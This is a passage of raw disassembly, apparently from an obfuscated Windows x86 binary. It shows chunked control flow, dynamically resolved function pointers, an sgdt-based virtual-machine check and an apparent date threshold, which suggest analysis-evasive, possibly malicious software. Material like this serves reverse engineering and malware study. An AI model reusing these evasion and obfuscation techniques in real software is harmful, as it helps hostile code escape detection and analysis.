; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AC764: ; CODE XREF: sub_9B1D80+1EC6�j
push 201h
pop ecx
div ecx
add edx, 200h
loc_9AC772: ; CODE XREF: sub_9B1D80-66EE�j
mov [ebp-2068h], edx
push edx
lea edx, [ebp-201Ch]
push edx
push ebx
lea ecx, [ebp-2058h]
lea edx, [ebp-204Ch]
call sub_9B174C
push dword ptr [ebp-204Ch]
pop eax
and eax, eax
jz loc_9B3EC4
jmp loc_9AC458
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9AC7A8: ; CODE XREF: sub_9B04A8+3EBB�j
; DATA XREF: .text:off_9B9151�o
push 2000h
lea edx, [ebp-401Ch]
push edx
mov eax, 0Ah
lea ecx, [ebp-402Ch]
lea ebx, [ebp-4044h]
mov edi, esi
call sub_9B0734
mov ebx, eax
mov [ebp-404Ch], ebx
test bl, 2
jz loc_9B433A
jmp loc_9B4330
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B57B4
loc_9AC7E4: ; CODE XREF: sub_9B57B4-22A0�j
; DATA XREF: .text:off_9BA707�o
push off_9B9207
push 0
lea eax, [ebp+var_24]
push eax
call dword ptr [edx+4]
and eax, eax
jz loc_9B45EC
jmp off_9B91C8
; END OF FUNCTION CHUNK FOR sub_9B57B4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3A74
loc_9AC804: ; CODE XREF: sub_9B3A74-8BB4�j
; DATA XREF: .text:off_9B9E28�o
mov dword ptr [ebp-124h], 0
jmp loc_9B624E
; END OF FUNCTION CHUNK FOR sub_9B3A74
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AC814: ; CODE XREF: sub_9B0930+37A3�j
; DATA XREF: .text:off_9B9946�o
mov edx, [ebp-1Ch]
mov [ecx], edx
push off_9BAA83
call ebx
push dword_9BCB74
pop ecx
mov edx, [ecx+4]
mov [edx], eax
push off_9B9EC0
call ebx
mov ecx, dword_9BCB74
push dword ptr [ecx+8]
pop edx
mov [edx], eax
push off_9B969B
call ebx
mov ecx, dword_9BCB74
mov edx, [ecx+0Ch]
mov [edx], eax
push off_9B9A8F
call ebx
push dword_9BCB74
pop ecx
mov edx, [ecx+10h]
mov [edx], eax
push off_9B998A
call ebx
mov ecx, dword_9BCB74
mov edx, [ecx+14h]
mov [edx], eax
push offset aVersion ; "VERSION"
call ebx
mov ecx, dword_9BCB74
push dword ptr [ecx+18h]
pop edx
mov [edx], eax
mov eax, dword_9BCB74
mov ecx, [eax]
push dword ptr [ecx]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp off_9B89DD
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AEC20
loc_9AC8A8: ; CODE XREF: sub_9AEC20+4449�j
; DATA XREF: .text:off_9BAF9F�o
push off_9B9844
pop ecx
call sub_9B5480
mov dword_9BBE3C, esi
mov [ebp-228h], edi
loc_9AC8C0: ; CODE XREF: sub_9AEC20+4443�j
lea ecx, [ebp-228h]
call sub_9B5480
push 5
mov ecx, 4
mov edx, off_9B9076
call sub_9B4480
and eax, eax
jnz loc_9AB712
jmp loc_9AB70C
; END OF FUNCTION CHUNK FOR sub_9AEC20
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AC8EC: ; CODE XREF: sub_9B63D8-80DF�j
; DATA XREF: .text:off_9BA158�o
push 0Ch
pop eax
loc_9AC8EF: ; CODE XREF: sub_9B63D8-30B�j
mov [ebp-212Ch], eax
lea edx, [ebx-4]
cmp eax, edx
jg loc_9AC5CD
jmp off_9BAAC4
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B46CC
loc_9AC908: ; CODE XREF: sub_9B46CC-57ED�j
; sub_9B46CC+9�j
; DATA XREF: ...
mov edx, dword_9BCB74
push dword ptr [edx]
pop eax
push esi
call dword ptr [eax+30h]
mov esi, dword_9BCB98
mov dword_9BEC18, eax
call sub_9B227C
add eax, esi
cmp eax, 49614D80h
pop esi
jnb loc_9B2424
jmp off_9BA388
; END OF FUNCTION CHUNK FOR sub_9B46CC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B161C
loc_9AC93C: ; CODE XREF: sub_9B161C+DD�j
; DATA XREF: .text:off_9B962E�o
mov eax, esi
loc_9AC93E: ; CODE XREF: sub_9B161C+D7�j
mov ecx, dword_9BCB74
mov edx, [ecx+10h]
push 0
push eax
push ebx
push edi
call dword ptr [edx+48h]
and eax, eax
jle loc_9AB904
jmp off_9BA98A
; END OF FUNCTION CHUNK FOR sub_9B161C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AC960: ; CODE XREF: sub_9B0930-2804�j
; DATA XREF: .text:off_9BB00E�o
push off_9BAB84
mov eax, [eax]
push eax
call esi
mov ecx, dword_9BCB74
push dword ptr [ecx+10h]
pop edx
mov [edx+2Ch], eax
push dword_9BCB74
pop eax
push dword ptr [eax+10h]
pop eax
push dword ptr [eax+2Ch]
pop ecx
or ecx, ecx
jz loc_9B23EF
jmp off_9BA378
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B35A0
loc_9AC99B: ; CODE XREF: sub_9B35A0-24A1�j
mov [ebp+var_4], 0FFFFFFFFh
push dword_9BCB74
pop edx
mov eax, [edx]
push off_9BA623
call dword ptr [eax+1Ch]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B35A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9AC9C8: ; CODE XREF: sub_9ADDA4:loc_9B1C08�j
; DATA XREF: .text:009B2B24�o ...
lea eax, [edi-1]
mov [ebp-20h], eax
jmp loc_9AED43
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B1134
loc_9AC9D7: ; CODE XREF: sub_9B1134+39�j
mov [ebp+var_4], 0FFFFFFFFh
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
push 0
call dword ptr [edx+60h]
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9B1134
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9ACA04: ; CODE XREF: sub_9B63D8-DF0�j
; DATA XREF: .text:off_9B9082�o
lea esi, [ebp-2120h]
mov ecx, 9
mov edi, off_9B9645
sub edx, edx
repe cmpsb
jnz loc_9AF944
jmp off_9B95D3
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9ACA28: ; CODE XREF: sub_9B04A8+A1A�j
; sub_9B04A8+2191�j
mov dword ptr [ebp-4048h], 2
loc_9ACA32: ; CODE XREF: sub_9B04A8-2EA�j
cmp dword ptr [ebp-4048h], 7D0h
jge loc_9AFD43
jmp off_9BAB52
; END OF FUNCTION CHUNK FOR sub_9B04A8
; =============== S U B R O U T I N E =======================================
sub_9ACA48 proc near ; DATA XREF: .text:off_9BA0BD�o
; FUNCTION CHUNK AT 009ADC24 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 009B109C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009B26DF SIZE 00000033 BYTES
; FUNCTION CHUNK AT 009B5DD4 SIZE 00000035 BYTES
; FUNCTION CHUNK AT 009B5E0C SIZE 00000013 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BA6CC
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push 4044h
pop eax
call __alloca_probe
mov eax, dword_9B8788
xor eax, ebp
mov [ebp-1Ch], eax
push ebx
push esi
push edi
mov [ebp-18h], esp
push dword ptr [ebp+8]
pop eax
mov [ebp-4058h], eax
push dword ptr [eax+0Ch]
pop esi
push dword ptr [eax+10h]
pop ebx
mov [ebp-4050h], ebx
mov dword ptr [ebp-4], 0
lea edi, [ebp-4044h]
lea eax, [ebp-4034h]
call sub_9AC128
push 0
push 0
push 0
push 0
push 0
call sub_9B36E8
push eax
push 0
push 6
push ebx
push 1
lea eax, [ebp-4048h]
push eax
lea ecx, [ebp-4022h]
push ecx
call sub_9B2F1C
add esp, 30h
push dword ptr [ebp-4048h]
pop edi
test edi, edi
jz loc_9B5E0C
jmp off_9B8D6D
sub_9ACA48 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9ACAF8: ; CODE XREF: sub_9ACEE8+1B38�j
; sub_9ACEE8+267C�j
; DATA XREF: ...
sub eax, eax
mov [ebp-0C0h], eax
loc_9ACB00: ; CODE XREF: sub_9ACEE8+1B32�j
and eax, eax
jz loc_9AB6CC
jmp loc_9B5978
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B227C
loc_9ACB10: ; CODE XREF: sub_9B227C+4C�j
mov dword_9BCB90, esi
mov dword_9BCB94, ecx
loc_9ACB1C: ; CODE XREF: sub_9B227C+46�j
push dword_9BCB74
pop ecx
mov edx, [ecx]
push off_9BAF9B
call dword ptr [edx+1Ch]
mov eax, esi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_9B227C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ABD30
loc_9ACB34: ; CODE XREF: sub_9ABD30+89EB�j
; DATA XREF: .text:off_9BA7FA�o
mov eax, [esp+0Ch+arg_8]
pop edi
mov [eax], esi
pop esi
mov eax, 4
pop ebp
retn 10h
; END OF FUNCTION CHUNK FOR sub_9ABD30
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9ACB48: ; CODE XREF: sub_9B4FD0-317D�j
; DATA XREF: .text:off_9B8E16�o
push dword ptr [ebp+18h]
pop edx
cmp dword_9BBF88[eax], edx
jnz loc_9AB8C4
jmp loc_9B0A98
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9ACB60: ; CODE XREF: sub_9B63D8-2224�j
push 0Ch
pop esi
mov [ebp-212Ch], esi
loc_9ACB69: ; CODE XREF: sub_9B63D8-4196�j
add ebx, 0FFFFFFE9h
cmp esi, ebx
jg loc_9AC5C0
jmp loc_9AFAB4
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9ACB7C: ; CODE XREF: sub_9ADDA4+43�j
mov eax, dword_9BF120[ecx*4]
and eax, eax
jz loc_9AF4F3
jmp loc_9AF4E8
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B2E04
loc_9ACB90: ; CODE XREF: sub_9B2E04+292E�j
cmp edi, 0FFFFFFFFh
jz loc_9B107C
jmp off_9B8C1C
; END OF FUNCTION CHUNK FOR sub_9B2E04
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9ACBA0: ; CODE XREF: sub_9B63D8-68FC�j
lea edx, [esi+12h]
mov [ebp-2164h], edx
mov [ebp-2130h], eax
loc_9ACBAF: ; CODE XREF: sub_9B63D8-8B1�j
mov cl, [edx+ebp-2120h]
mov [ebp-2139h], cl
inc edx
cmp cl, 30h
mov [ebp-2164h], edx
jl loc_9AF944
jmp loc_9B1FF8
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AFF64
loc_9ACBD4: ; CODE XREF: sub_9AFF64-23DF�j
; sub_9AFF64+3E8E�j
mov eax, 1
mov [ebp+var_228], eax
jmp loc_9B5807
; END OF FUNCTION CHUNK FOR sub_9AFF64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9ACBE4: ; CODE XREF: sub_9B0930-25A7�j
; DATA XREF: .text:off_9B9F7A�o
push off_9B93D7
mov ecx, [eax]
push ecx
call esi
push dword_9BCB74
pop edx
mov ecx, [edx+0Ch]
mov [ecx+24h], eax
mov eax, dword_9BCB74
push dword ptr [eax+0Ch]
pop edx
push dword ptr [edx+24h]
pop ecx
or ecx, ecx
jz loc_9B23EF
jmp loc_9AFC00
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9ACC18: ; CODE XREF: sub_9B4FD0+50C�j
inc eax
jmp loc_9B104E
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9ACC20: ; CODE XREF: sub_9ADDA4:loc_9B1C08�j
; DATA XREF: .text:off_9B2B18�o
sub eax, eax
mov dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9ACC3C: ; CODE XREF: sub_9B3864-1EB5�j
jnb loc_9ABA28
jmp loc_9AD1DC
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B36E8
loc_9ACC48: ; CODE XREF: sub_9B36E8-5748�j
; DATA XREF: .text:off_9B89CA�o
push 4
pop edx
call sub_9AEE5C
mov edi, eax
mov [ebp-20h], edi
mov ebx, dword_9BCB98
mov [ebp-24h], ebx
call sub_9B227C
add eax, ebx
cmp eax, edi
jb loc_9AE975
jmp loc_9AE96C
; END OF FUNCTION CHUNK FOR sub_9B36E8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9ACC74: ; CODE XREF: sub_9AC6DC+397E�j
push dword_9BBD20
pop eax
mov dword_9BBD24, eax
jmp loc_9AF003
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9ACC88: ; CODE XREF: sub_9AB1A0+2E4A�j
push dword_9BCB74
pop ecx
push dword ptr [ecx+10h]
pop edx
mov eax, dword_9BEC30[eax]
push eax
call dword ptr [edx+34h]
not eax
lea ecx, [eax+edi+1]
mov [ebp-24h], ecx
loc_9ACCA6: ; CODE XREF: sub_9AB1A0+2A77�j
; sub_9AB1A0+2E44�j ...
inc esi
mov [ebp-28h], esi
mov edi, [ebp-24h]
jmp loc_9AB014
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9ACCB4: ; CODE XREF: sub_9AB1A0+39C3�j
; DATA XREF: .text:off_9BA688�o
mov eax, dword_9BEC28[esi]
test eax, eax
jz loc_9ABD29
jmp off_9BA07C
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ABF08
loc_9ACCC8: ; CODE XREF: sub_9ABF08+4CB0�j
; DATA XREF: .text:off_9B9A50�o
cmp eax, 0FFFFFFFFh
jnz loc_9AF21B
jmp off_9BA3A4
; END OF FUNCTION CHUNK FOR sub_9ABF08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B649C
loc_9ACCD8: ; CODE XREF: sub_9B649C-A25A�j
; sub_9B649C-55C6�j ...
sub eax, eax
mov [ebp+var_1C], eax
loc_9ACCDD: ; CODE XREF: sub_9B649C-3300�j
mov [ebp+var_4], 0FFFFFFFFh
push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B649C
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B037C
loc_9ACCFC: ; CODE XREF: sub_9B037C-4351�j
lea ecx, [ebp-403Ch]
push ecx
push eax
lea edx, [ebp-201Ch]
push edx
push 5
pop eax
push edi
pop esi
call sub_9B3F28
mov [ebp-4048h], eax
jmp loc_9AB9A8
; END OF FUNCTION CHUNK FOR sub_9B037C
; =============== S U B R O U T I N E =======================================
sub_9ACD20 proc near ; CODE XREF: sub_9B03E8+2780�p
var_A = byte ptr -0Ah
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009AB768 SIZE 00000002 BYTES
push ecx
push ecx
sgdt fword ptr [esp+8+var_A]
pop dword ptr [esp+8+var_A+2]
mov eax, [esp+4+var_4]
and eax, 0FF000000h
sub eax, 0FF000000h
neg eax
sbb eax, eax
inc eax
jmp off_9BAC75
sub_9ACD20 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AEC20
loc_9ACD44: ; CODE XREF: sub_9AEC20-34F4�j
; DATA XREF: .text:off_9B92F4�o
mov dword_9BBD30, edi
jmp loc_9AE5B7
; END OF FUNCTION CHUNK FOR sub_9AEC20
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9ACD50: ; CODE XREF: sub_9AB1A0+38B5�j
; DATA XREF: .text:off_9B938C�o
push dword ptr [ebx]
pop eax
push dword ptr [ebp+8]
pop ecx
mov [ecx+eax*4], esi
inc dword ptr [ebx]
jmp loc_9B58CD
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0734
loc_9ACD64: ; CODE XREF: sub_9B0734-548C�j
cmp eax, 2746h
jnz loc_9B2679
jmp loc_9B2674
; END OF FUNCTION CHUNK FOR sub_9B0734
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9ACD74: ; CODE XREF: sub_9B1F68+6B�j
mov eax, esi
neg eax
sbb eax, eax
and eax, 0FFFFFFECh
add eax, 28h
mov [ebp-40h], eax
loc_9ACD83: ; CODE XREF: sub_9B1F68-1145�j
; sub_9B1F68+2153�j ...
push dword ptr [ebp-38h]
pop esi
neg esi
sbb esi, esi
and esi, 0FA0h
add esi, 3E8h
mov [ebp-48h], esi
call sub_9AB574
mov [ebp-60h], eax
cmp eax, 0FFFFFFFFh
jnz loc_9B4874
jmp off_9BAB80
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AFB1C
loc_9ACDB4: ; CODE XREF: sub_9AFB1C+2DE9�j
mov ecx, [edi+eax]
add eax, 4
mov [esi+10h], ecx
mov [ebp-1Ch], eax
loc_9ACDC0: ; CODE XREF: sub_9AFB1C+2DE3�j
test bl, 20h
jz loc_9B18D9
jmp loc_9B18CC
; END OF FUNCTION CHUNK FOR sub_9AFB1C
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-228h]
pop ebx
; START OF FUNCTION CHUNK FOR sub_9ABB50
loc_9ACDE1: ; CODE XREF: sub_9ABB50+17�j
; sub_9B4FD0-5215�j
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
push off_9BA623
call dword ptr [eax+1Ch]
push ebx
pop eax
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
push dword ptr [ebp-1Ch]
pop ecx
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 20h
; END OF FUNCTION CHUNK FOR sub_9ABB50
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3408
loc_9ACE18: ; CODE XREF: sub_9B3408-2BF9�j
; DATA XREF: .text:off_9BA859�o
cmp ecx, 100000h
ja loc_9AB749
jmp off_9B94F0
; END OF FUNCTION CHUNK FOR sub_9B3408
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADCEC
loc_9ACE2C: ; CODE XREF: sub_9ADCEC-27FE�j
call sub_9B227C
sub eax, dword_9BEBD4
loc_9ACE37: ; CODE XREF: sub_9ADCEC+E63�j
mov [ebx+12h], eax
push dword_9BEBD0
pop eax
cmp eax, 0FFFFh
jle loc_9AB876
jmp off_9BA425
; END OF FUNCTION CHUNK FOR sub_9ADCEC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9ACE54: ; CODE XREF: sub_9B1F68+809�j
cmp ebx, [ebp-40h]
jnb loc_9B01DE
jmp loc_9AFDC0
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B36E8
loc_9ACE64: ; CODE XREF: sub_9B36E8-4D66�j
; DATA XREF: .text:off_9BAECD�o
or esi, 80000000h
mov [ebp-1Ch], esi
loc_9ACE6D: ; CODE XREF: sub_9B36E8-7255�j
; sub_9B36E8-574E�j ...
mov dword ptr [ebp-4], 0FFFFFFFFh
jmp loc_9AC73E
; END OF FUNCTION CHUNK FOR sub_9B36E8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AFF64
loc_9ACE7C: ; CODE XREF: sub_9AFF64+3E94�j
; DATA XREF: .text:off_9BAEA5�o
sub eax, eax
mov [ebp+var_228], eax
jmp loc_9B5807
; END OF FUNCTION CHUNK FOR sub_9AFF64
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-1Ch]
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B43F4
loc_9ACEAF: ; CODE XREF: sub_9B43F4-5C4F�j
; sub_9B43F4-4A69�j ...
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-1Ch]
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 14h
; END OF FUNCTION CHUNK FOR sub_9B43F4
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9ACED0: ; CODE XREF: sub_9B3864-475C�j
; DATA XREF: .text:off_9B9568�o
lea eax, [ebp+var_203C]
push 0
push 0
push 0
push 0
push 0
push ebx
push eax
jmp loc_9B3D79
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9ACEE8 proc near ; DATA XREF: .text:off_9B909D�o
; FUNCTION CHUNK AT 009AB6CC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009AB930 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009ABB6C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 009AC65C SIZE 00000041 BYTES
; FUNCTION CHUNK AT 009ACAF8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009AE600 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009AEA14 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009AF3F8 SIZE 00000038 BYTES
; FUNCTION CHUNK AT 009AF51C SIZE 00000054 BYTES
; FUNCTION CHUNK AT 009AFF00 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B0324 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 009B0F74 SIZE 00000046 BYTES
; FUNCTION CHUNK AT 009B1AD3 SIZE 00000037 BYTES
; FUNCTION CHUNK AT 009B2324 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009B2C9C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B33AC SIZE 00000023 BYTES
; FUNCTION CHUNK AT 009B34B0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009B47C4 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 009B5978 SIZE 00000026 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B984C
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0D8h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp-1Ch], eax
push ebx
push esi
push edi
mov [ebp-18h], esp
push dword ptr [ebp+8]
pop eax
xor ebx, ebx
mov [ebp-0E0h], eax
mov [ebp-4], ebx
mov ecx, 24h
mov [ebp-0BCh], ebx
mov [ebp-0B8h], ebx
mov [ebp-0B0h], bl
sub eax, eax
lea edi, [ebp-0AFh]
rep stosd
stosw
mov [ebp-0B4h], ebx
loc_9ACF55: ; CODE XREF: sub_9ACEE8-1812�j
; sub_9ACEE8+171F�j ...
mov ecx, [ebp-0E0h]
push ecx
mov edx, 1388h
call sub_9B5CDC
test eax, eax
jnz loc_9B1AD3
jmp off_9B9F4C
sub_9ACEE8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9ACF74: ; CODE XREF: sub_9AB1A0+EA7�j
; sub_9AB1A0+A9DF�j
; DATA XREF: ...
push esi
call sub_9B3EFC
add esp, 4
test eax, eax
jz loc_9AEA48
jmp loc_9AE758
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B5904
loc_9ACF8C: ; CODE XREF: sub_9B5904+11�j
cmp bl, 7Fh
jz loc_9B42FE
jmp loc_9B47E8
; END OF FUNCTION CHUNK FOR sub_9B5904
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
sub_9ACF9C proc near ; CODE XREF: sub_9B43F4-4A6E�p
; FUNCTION CHUNK AT 009ADA23 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009AEF7C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AF134 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009AFCBC SIZE 0000002B BYTES
; FUNCTION CHUNK AT 009B2D30 SIZE 00000041 BYTES
; FUNCTION CHUNK AT 009B5C80 SIZE 00000017 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B920F
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov esi, ecx
mov [ebp-18h], esp
mov dword ptr [ebp-4], 0
cmp esi, 300h
jb loc_9ADA23
jmp loc_9AEF7C
sub_9ACF9C endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9ACFE0: ; CODE XREF: sub_9B63D8-3992�j
; DATA XREF: .text:off_9B9823�o
add esp, 4
test eax, eax
jz loc_9AF944
jmp off_9B8D65
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9ACFFC: ; CODE XREF: sub_9B04A8+3E9B�j
; DATA XREF: .text:off_9B88B7�o
mov dword ptr [ebp-4044h], 0
test bl, 40h
jz loc_9AFD43
jmp loc_9AE460
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AD014: ; CODE XREF: sub_9B63D8-801�j
mov [ebp-1Dh], al
jmp loc_9B4ED3
; END OF FUNCTION CHUNK FOR sub_9B63D8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AD01C proc near ; CODE XREF: sub_9AF698:loc_9AB82C�j
; .text:009AFBF4�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009B5BE3 SIZE 00000019 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B8FCC
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_4], 0
mov eax, dword_9BCB74
mov ecx, [eax]
call dword ptr [ecx+30h]
mov dword_9BEBD8, eax
push 1
mov ecx, 18h
mov edx, off_9B989B
call sub_9B1B20
push 6
mov ecx, 2004h
mov edx, off_9B985C
call sub_9B1B20
jmp loc_9B5BE3
sub_9AD01C endp
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B1584
loc_9AD087: ; CODE XREF: sub_9B1584-31B9�j
; sub_9B1584-2751�j
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_1C]
